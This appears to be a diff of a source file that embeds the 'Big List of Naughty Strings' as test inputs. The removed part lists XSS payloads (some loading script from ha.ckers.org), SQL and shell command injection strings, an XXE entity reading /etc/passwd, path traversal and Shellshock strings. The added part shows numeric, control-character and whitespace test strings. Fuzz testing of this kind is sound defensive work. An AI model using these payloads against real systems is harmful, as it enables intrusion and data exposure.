-// Strings which contain unicode with an \"upsidedown\" effect (via http://www.upsidedowntext.com) - -"ᅨルミnb£ᄡノlミ ミuᅥテミᆵ ᅦンᄍolop ᅧヌᅦン ᅦンᄍoqミl ᅧヌn ᅧヌunp£ᄡノp£ᄡノヤu£ᄡノ ᄍodᆵᅦンᅧヌ poᆵsn£ᄡノᅦン op pᅦンs 'ᅧヌ£ᄡノlᅦン ᅥテu£ᄡノヤs£ᄡノd£ᄡノpミ ᄍnᅧヌᅦンᅧヌヤᅦンsuoヤ 'ᅧヌᅦンᆵミ ᅧヌ£ᄡノs ᄍolop ᆵnsd£ᄡノ ᆵᅦンᄍoᅨᆬ", -"00ᅨルᅥヨ$-", - -// Unicode font -// -// Strings which contain bold/italic/etc. versions of normal characters - -"ᄐᄡᄑネᄑナ ᄑムᄑユᄑノᄑテᄑヒ ᄑツᄑメᄑマᄑラᄑホ ᄑニᄑマᄑリ ᄑハᄑユᄑヘᄑミᄑモ ᄑマᄑヨᄑナᄑメ ᄑヤᄑネᄑナ ᄑフᄑチᄑレᄑル ᄑトᄑマᄑヌ", -"ンミモンミᄀンミ゙ ンミᆰンミᆴンミᄁンミワンミᄂ ンミロンミᆱンミᄄンミᄚンミᄃ ンミ゚ンミᄄンミᄆ ンミᆪンミᆴンミᆭンミᄅンミᆲ ンミᄄンミᆵンミ゙ンミᆱ ンミᆳンミᄀンミ゙ ンミᆬンミレンミᄈンミᄇ ンミンンミᄄンミᅠ", -"ンユンヨヘンヨハ ンヨヨンヨレンヨホンヨネンヨミ ンヨヌンヨランヨヤンヨワンヨモ ンヨヒンヨヤンヨン ンヨマンヨレンヨメンヨユンヨリ ンヨヤンヨロンヨハンヨラ ンヨルンヨヘンヨハ ンヨムンヨニンヨ゚ンヨ゙ ンヨノンヨヤンヨフ", -"ンムᄏンメノンメニ ンメメンメヨンメハンメトンメフ ンメテンメモンメミンメリンメマ ンメヌンメミンメル ンメヒンメヨンメホンメムンメヤ ンメミンメランメニンメモ ンメユンメノンメニ ンメヘンメツンメロンメレ ンメナンメミンメネ", -"ンモᆪンモᄆンモᆴ ンモᄎンモᄒンモᄇンモᆲンモᄡ ンモᆱンモᄏンモᄌンヤタンモᄋ ンモᆵンモᄌンヤチ ンモᄈンモᄒンモᄊンモᄍンモᄐ ンモᄌンモンモᆴンモᄏ ンモᄑンモᄆンモᆴ ンモᄉンモᆰンヤテンヤツ ンモᆳンモᄌンモᄚ", -"ンユヒンユルンユヨ ンユᄁンユᆭンユレンユヤンユワ ンユモンユᆪンユᅠンユᄄンユ゚ ンユランユᅠンユᄅ ンユロンユᆭンユ゙ンユᄀンユᄂ ンユᅠンユᄃンユヨンユᆪ ンユᆬンユルンユヨ ンユンンユメンユᆱンユᆰ ンユユンユᅠンユリ", -"ンレテンレムンレホ ンレレンレ゙ンレメンレフンレヤ ンレヒンレロンレリンレᅠンレラ ンレマンレリンレᄀ ンレモンレ゙ンレヨンレルンレワ ンレリンレ゚ンレホンレロ ンレンンレムンレホ ンレユンレハンレᆪンレᄁ ンレヘンレリンレミ", -"¬メᆵ¬メᆪ¬メᅠ ¬メᆲ¬メᄚ¬メᄂ¬メ゙¬メᆭ ¬メン¬メᆳ¬メᆰ¬メᄇ¬メᄅ ¬メᄀ¬メᆰ¬メᄈ ¬メᆬ¬メᄚ¬メᄄ¬メᆱ¬メᆴ ¬メᆰ¬メᄆ¬メᅠ¬メᆳ ¬メᆵ¬メᆪ¬メᅠ ¬メᄃ¬メワ¬メᄉ¬メᄡ ¬メ゚¬メᆰ¬メᄁ", - -// Script Injection -// -// Strings which attempt to invoke a benign script injection; shows vulnerability to XSS - -"<script>alert(123)</script>", -"<script>alert('123');</script>", -"<img src=x onerror=alert(123) />", -"<svg><script>123<1>alert(123)</script>", -"\"><script>alert(123)</script>", -"'><script>alert(123)</script>", -"><script>alert(123)</script>", -"</script><script>alert(123)</script>", -"< / script >< script >alert(123)< / script >", -" onfocus=JaVaSCript:alert(123) autofocus", -"\" onfocus=JaVaSCript:alert(123) autofocus", -"' onfocus=JaVaSCript:alert(123) autofocus", -"ᄐワscriptᄐ゙alert(123)ᄐワ/scriptᄐ゙", -"<sc<script>ript>alert(123)</sc</script>ript>", 
-"--><script>alert(123)</script>", -"\";alert(123);t=\"", -"';alert(123);t='", -"JavaSCript:alert(123)", -";alert(123);", -"src=JaVaSCript:prompt(132)", -"\"><script>alert(123);</script x=\"", -"'><script>alert(123);</script x='", -"><script>alert(123);</script x=", -"\" autofocus onkeyup=\"javascript:alert(123)", -"' autofocus onkeyup='javascript:alert(123)", -"<script\\x20type=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x09type=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>", -"<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>", -"'`\"><\\x3Cscript>javascript:alert(1)</script>", -"'`\"><\\x00script>javascript:alert(1)</script>", -"ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF", -"ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF", -"ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF", -"ABC<div 
style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF", -"ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF", -"<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Ajavascript:javascript:alert(1)\" 
id=\"fuzzelement1\">test</a>", -"<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a 
href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", -"`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>", -"`\"'><img src=xxx:x 
\\x09onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>", -"`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>", -"\"`'><script>\\x3Bjavascript:alert(1)</script>", -"\"`'><script>\\x0Djavascript:alert(1)</script>", -"\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>", -"\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>", -"\"`'><script>\\x09javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>", -"\"`'><script>\\x00javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>", -"\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>", -"\"`'><script>\\x0Cjavascript:alert(1)</script>", -"\"`'><script>\\x2Bjavascript:alert(1)</script>", -"\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>", -"\"`'><script>-javascript:alert(1)</script>", -"\"`'><script>\\x0Ajavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>", -"\"`'><script>\\x7Ejavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>", -"\"`'><script>\\xC2\\x85javascript:alert(1)</script>", -"\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>", -"\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>", 
-"\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>", -"\"`'><script>\\x21javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>", -"\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>", -"\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>", -"\"`'><script>\\x0Bjavascript:alert(1)</script>", -"\"`'><script>\\x20javascript:alert(1)</script>", -"\"`'><script>\\xC2\\xA0javascript:alert(1)</script>", -"<img \\x00src=x onerror=\"alert(1)\">", -"<img \\x47src=x onerror=\"javascript:alert(1)\">", -"<img \\x11src=x onerror=\"javascript:alert(1)\">", -"<img \\x12src=x onerror=\"javascript:alert(1)\">", -"<img\\x47src=x onerror=\"javascript:alert(1)\">", -"<img\\x10src=x onerror=\"javascript:alert(1)\">", -"<img\\x13src=x onerror=\"javascript:alert(1)\">", -"<img\\x32src=x onerror=\"javascript:alert(1)\">", -"<img\\x47src=x onerror=\"javascript:alert(1)\">", -"<img\\x11src=x onerror=\"javascript:alert(1)\">", -"<img \\x47src=x onerror=\"javascript:alert(1)\">", -"<img \\x34src=x onerror=\"javascript:alert(1)\">", -"<img \\x39src=x onerror=\"javascript:alert(1)\">", -"<img \\x00src=x onerror=\"javascript:alert(1)\">", -"<img src\\x09=x onerror=\"javascript:alert(1)\">", -"<img src\\x10=x onerror=\"javascript:alert(1)\">", -"<img src\\x13=x onerror=\"javascript:alert(1)\">", -"<img src\\x32=x onerror=\"javascript:alert(1)\">", -"<img src\\x12=x onerror=\"javascript:alert(1)\">", -"<img src\\x11=x onerror=\"javascript:alert(1)\">", -"<img src\\x00=x onerror=\"javascript:alert(1)\">", -"<img src\\x47=x onerror=\"javascript:alert(1)\">", -"<img src=x\\x09onerror=\"javascript:alert(1)\">", -"<img src=x\\x10onerror=\"javascript:alert(1)\">", -"<img src=x\\x11onerror=\"javascript:alert(1)\">", -"<img src=x\\x12onerror=\"javascript:alert(1)\">", -"<img src=x\\x13onerror=\"javascript:alert(1)\">", -"<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">", -"<img src=x onerror=\\x09\"javascript:alert(1)\">", -"<img src=x 
onerror=\\x10\"javascript:alert(1)\">", -"<img src=x onerror=\\x11\"javascript:alert(1)\">", -"<img src=x onerror=\\x12\"javascript:alert(1)\">", -"<img src=x onerror=\\x32\"javascript:alert(1)\">", -"<img src=x onerror=\\x00\"javascript:alert(1)\">", -"<a href=javascript:javascript:alert(1)>XXX</a>", -"<img src=\"x` `<script>javascript:alert(1)</script>\"` `>", -"<img src onerror /\" '\"= alt=javascript:alert(1)//\">", -"<title onpropertychange=javascript:alert(1)></title><title title=>", -"<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", -"<!--[if]><script>javascript:alert(1)</script -->", -"<!--[if<img src=x onerror=javascript:alert(1)//]> -->", -"<script src=\"/\%(jscript)s\"></script>", -"<script src=\"\\%(jscript)s\"></script>", -"<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", -"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", -"<IMG SRC=# onmouseover=\"alert('xxs')\">", -"<IMG SRC= onmouseover=\"alert('xxs')\">", -"<IMG onmouseover=\"alert('xxs')\">", -"<IMG SRC=javascript:alert('XSS')>", -"<IMG SRC=javascript:alert('XSS')>", -"<IMG SRC=javascript:alert('XSS')>", -"<IMG SRC=\"jav ascript:alert('XSS');\">", -"<IMG SRC=\"jav	ascript:alert('XSS');\">", -"<IMG SRC=\"jav
ascript:alert('XSS');\">", -"<IMG SRC=\"jav
ascript:alert('XSS');\">", -"perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out", -"<IMG SRC=\"  javascript:alert('XSS');\">", -"<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", -"<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", -"<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", -"<<SCRIPT>alert(\"XSS\");//<</SCRIPT>", -"<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", -"<SCRIPT SRC=//ha.ckers.org/.j>", -"<IMG SRC=\"javascript:alert('XSS')\"", -"<iframe src=http://ha.ckers.org/scriptlet.html <", -"\\\";alert('XSS');//", -"<u oncopy=alert()> Copy me</u>", -"<i onwheel=alert(1)> Scroll over me </i>", -"<plaintext>", -"http://a/%%30%30", -"</textarea><script>alert(123)</script>", - -// SQL Injection -// -// Strings which can cause a SQL injection if inputs are not sanitized - -"1;DROP TABLE users", -"1'; DROP TABLE users-- 1", -"' OR 1=1 -- 1", -"' OR '1'='1", -" ", -"%", -"_", - -// Server Code Injection -// -// Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153) - -"-", -"--", -"--version", -"--help", -"$USER", -"/dev/null; touch /tmp/blns.fail ; echo", -"`touch /tmp/blns.fail`", -"$(touch /tmp/blns.fail)", -"@{[system \"touch /tmp/blns.fail\"]}", - -// Command Injection (Ruby) -// -// Strings which can call system commands within Ruby/Rails applications - -"eval(\"puts 'hello world'\")", -"System(\"ls -al /\")", -"`ls -al /`", -"Kernel.exec(\"ls -al /\")", -"Kernel.exit(1)", -"%x('ls -al /')", - -// XXE Injection (XML) -// -// String which can reveal system files when parsed by a badly configured XML parser - -"<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>", - -// Unwanted Interpolation -// -// Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or shell eval. 
Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string. - -"$HOME", -"$ENV{'HOME'}", -"%d", -"%s", -"{0}", -"%*.*s", -"File:///", - -// File Inclusion -// -// Strings which can cause user to pull in files that should not be a part of a web server - -"../../../../../../../../../../../etc/passwd%00", -"../../../../../../../../../../../etc/hosts", - -// Known CVEs and Vulnerabilities -// -// Strings that test for known vulnerabilities - -"() { 0; }; touch /tmp/blns.shellshock1.fail;", -"() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", -"<<< %s(un='%s') = %u", -"+++ATH0", - -// MSDOS/Windows Special Filenames -// -// Strings which are reserved characters in MSDOS/Windows - -"CON", -"PRN", -"AUX", -"CLOCK$", -"NUL", -"A:", -"ZZ:", -"COM1", -"LPT1", -"LPT2", -"LPT3", -"COM2", -"COM3", -"COM4", - -// IRC specific strings -// -// Strings that may occur on IRC clients that make security products freak out - -"DCC SEND STARTKEYLOGGER 0 0 0", - -// Scunthorpe Problem -// -// Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem) - -"Scunthorpe General Hospital", -"Penistone Community Church", -"Lightwater Country Park", -"Jimmy Clitheroe", -"Horniman Museum", -"shitake mushrooms", -"RomansInSussex.co.uk", -"http://www.cum.qc.ca/", -"Craig Cockburn, Software Specialist", -"Linda Callahan", -"Dr. Herman I. Libshitz", -"magna cum laude", -"Super Bowl XXX", -"medieval erection of parapets", -"evaluate", -"mocha", -"expression", -"Arsenal canal", -"classic", -"Tyson Gay", -"Dick Van Dyke", -"basement", - -// Human injection -// -// Strings which may cause human to reinterpret worldview - -"If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. 
Please wake up, we miss you.", - -// Terminal escape codes -// -// Strings which punish the fools who use cat/type on this file - -"Roses are [0;31mred[0m, violets are [0;34mblue. Hope you enjoy terminal hue", -"But now...[20Cfor my greatest trick...[8m", -"The quick brown fox... [Beeeep]", - -// iOS Vulnerabilities -// -// Strings which crashed iMessage in various versions of iOS - -"Powerトマトマᄉムᄄマトマトᄉムᄄマᄆᄆヒ ¢ᆬᆪ ¢ᆬᆪh ¢ᆬᆪ ¢ᆬᆪ¥ニラ", -"゚マᄈ0゚フネᄌマ" -};
\ No newline at end of file + // sourced from https://raw.githubusercontent.com/minimaxir/big-list-of-naughty-strings/master/blns.txt + + // Reserved Strings + // + // Strings which may be used elsewhere in code + + "undefined", "undef", "null", "NULL", "(null)", "nil", "NIL", "true", "false", "True", "False", "TRUE", "FALSE", "None", "hasOwnProperty", "\\", "\\\\", + + // Numeric Strings + // + // Strings which can be interpreted as numeric + + "0", "1", "1.00", "$1.00", "1/2", "1E2", "1E02", "1E+02", "-1", "-1.00", "-$1.00", "-1/2", "-1E2", "-1E02", "-1E+02", "1/0", "0/0", "-2147483648/-1", + "-9223372036854775808/-1", "-0", "-0.0", "+0", "+0.0", "0.00", "0..0", ".", "0.0.0", "0,00", "0,,0", ",", "0,0,0", "0.0/0", "1.0/0.0", "0.0/0.0", "1,0/0,0", + "0,0/0,0", "--1", "-", "-.", "-,", "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999", "NaN", "Infinity", + "-Infinity", "INF", "1#INF", "-1#IND", "1#QNAN", "1#SNAN", "1#IND", "0x0", "0xffffffff", "0xffffffffffffffff", "0xabad1dea", + "123456789012345678901234567890123456789", "1,000.00", "1 000.00", "1'000.00", "1,000,000.00", "1 000 000.00", "1'000'000.00", "1.000,00", "1 000,00", + "1'000,00", "1.000.000,00", "1 000 000,00", "1'000'000,00", "01000", "08", "09", "2.2250738585072011e-308", + + // Special Characters + // + // ASCII punctuation. All of these characters may need to be escaped in some + // contexts. Divided into three groups based on (US-layout) keyboard position. + + ",./;'[]\\-=", "<>?:\"{}|_+", "!@#$%^&*()`~", + + // Non-whitespace C0 controls: U+0001 through U+0008, U+000E through U+001F, + // and U+007F (DEL) + // Often forbidden to appear in various text-based file formats (e.g. XML), + // or reused for internal delimiters on the theory that they should never + // appear in input. + // The next line may appear to be blank or mojibake in some viewers. + "", + + // Non-whitespace C1 controls: U+0080 through U+0084 and U+0086 through U+009F. 
+ // Commonly misinterpreted as additional graphic characters. + // The next line may appear to be blank, mojibake, or dingbats in some viewers. + "ᅡタᅡチᅡツᅡテᅡトᅡニᅡヌᅡネᅡノᅡハᅡヒᅡフᅡヘᅡホᅡマᅡミᅡムᅡメᅡモᅡヤᅡユᅡヨᅡラᅡリᅡルᅡレᅡロᅡワᅡンᅡ゙ᅡ゚", + + // Whitespace: all of the characters with category Zs, Zl, or Zp (in Unicode + // version 8.0.0), plus U+0009 (HT), U+000B (VT), U+000C (FF), U+0085 (NEL), + // and U+200B (ZERO WIDTH SPACE), which are in the C categories but are often + // treated as whitespace in some contexts. + // This file unfortunately cannot express strings containing + // U+0000, U+000A, or U+000D (NUL, LF, CR). + // The next line may appear to be blank or mojibake in some viewers. + // The next line may be flagged for \"trailing whitespace\" in some viewers. + " ", " ᅡナ £レタ¬タタ¬タチ¬タツ¬タテ¬タト¬タナ¬タニ¬タヌ¬タネ¬タノ¬タハ¬タヒ¬タᄄ¬タᄅ¬タᆵ¬チ゚ ̄タタ", + + // Unicode additional control characters: all of the characters with + // general category Cf (in Unicode 8.0.0). + // The next line may appear to be blank or mojibake in some viewers. + "ᅡᆳタチツテトナワᅴンᅵマ£ᅠホ¬タヒ¬タフ¬タヘ¬タホ¬タマ¬タᆰ¬タᆱ¬タᆲ¬タᆳ¬タᆴ¬チᅠ¬チᄀ¬チᄁ¬チᆪ¬チᄂ¬チᆭ¬チᄃ¬チᄄ¬チᄅ¬チᆰ¬チᆱ¬チᆲ¬チᆳ¬チᆴ¬チᆵᄏ" + "ᄍᄎᄏムツᄑロᄇᅠロᄇᄀロᄇᄁロᄇᆪンナᄈンナᄡンナᄉンナᄊンナᄋンナᄌンナᄍンナᄎᅠタチᅠタᅠᅠタᄀᅠタᄁᅠタᆪᅠタᄂᅠ" + "タᆬᅠタᆭᅠタᄃᅠタᄄᅠタᄅᅠタᆰᅠタᆱᅠタᆲᅠタᆳᅠタᆴᅠタᆵᅠタᄚᅠタᄆᅠタᄇᅠタᄈᅠタᄡᅠタᄉᅠタᄊᅠタᄋᅠタᄌ" + "ᅠタᄍᅠタᄎᅠタᄏᅠタᄐᅠタᄑᅠタᄒᅠタᅠチタᅠチチᅠチツᅠチテᅠチトᅠチナᅠチニᅠチヌᅠチネᅠチノᅠチハᅠチヒ" + "ᅠチフᅠチヘᅠチホᅠチマᅠチミᅠチムᅠチメᅠチモᅠチヤᅠチユᅠチヨᅠチラᅠチリᅠチルᅠチレᅠチロᅠチワᅠチンᅠヂ" + "ᅠチ゚ᅠチᅠᅠチᄀᅠチᄁᅠチᆪᅠチᄂᅠチᆬᅠチᆭᅠチᄃᅠチᄄᅠチᄅᅠチᆰᅠチᆱᅠチᆲᅠチᆳᅠチᆴᅠチᆵᅠチᄚᅠチᄆ" + "ᅠチᄇᅠチᄈᅠチᄡᅠチᄉᅠチᄊᅠチᄋᅠチᄌᅠチᄍᅠチᄎᅠチᄏᅠチᄐᅠチᄑᅠチᄒᅠチ" + "", + + // \"Byte order marks\", U+FEFF and U+FFFE, each on its own line. + // The next two lines may appear to be blank or mojibake in some viewers. + "ᄏ", "ᄒ", + + // Unicode Symbols + // + // Strings which contain common unicode symbols (e.g. 
